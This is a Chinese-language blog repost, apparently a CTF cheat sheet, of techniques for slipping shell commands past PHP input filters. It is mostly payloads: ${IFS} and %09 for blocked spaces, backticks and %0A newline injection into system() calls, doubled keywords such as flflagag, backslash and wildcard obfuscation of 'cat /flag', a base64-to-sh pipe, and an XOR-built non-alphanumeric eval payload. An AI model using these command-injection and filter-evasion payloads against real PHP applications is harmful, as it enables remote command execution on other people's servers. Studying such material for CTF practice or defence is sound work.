PHP check 的一些绕过技术
2021-03-29 10:27
标签:system 通配符 截断 写作 targe url编码 www 绕过 span 执行命令加上反引号 双引号闭合 与 | 分割(或 反斜杠换行 模糊匹配(通配符) cat /fla? cat /fl* base64 echo Y2F0IC9mbGFn|base64 -d|sh (Y2F0IC9mbGFn = cat /flag ,不能用) 变量拼接 构造 getFlag 的异或字符串 注入一句话 如果下划线 本文转自:https://www.cnblogs.com/kalbertlee/p/12287073.html PHP check 的一些绕过技术 标签:system 通配符 截断 写作 targe url编码 www 绕过 span 原文地址:https://www.cnblogs.com/yesec/p/12608072.html绕过空格
$_GET[str]=str_replace(" ","",$_GET[str]);
${IFS} 但不能写作 $IFS $IFS$9 %09 绕过echo拼接
system("echo \"$_GET[str]\";");
`cat /flag` &后台 &&判读 在URL中均要进行URL编码)绕过符号
$_GET[str]=str_replace(array( "", "$", "(", ")", ";","&","|","$_GET[str]);
111"%0Acat %2fflag"
绕过关键词替换
$str=str_replace("flag","",$_GET[str]);
flflagag
绕过正则
preg_match("/flag/i",$str)
ca\t fla\g $a=%2ffl;$b=ag;cat $a$b; 绕过可见字符
if(preg_match("/[A-Za-z0-9_]+/",$code))
{die("NO.");}
@eval($code);
code=$_="%40%3e%2b%3b%2c%3c%3a"^"%27%5b%5f%7d%40%5d%5d";$_(); ${_GET}[_](${_GET}[__]) _被禁用,使用大于等于 %7F 的字符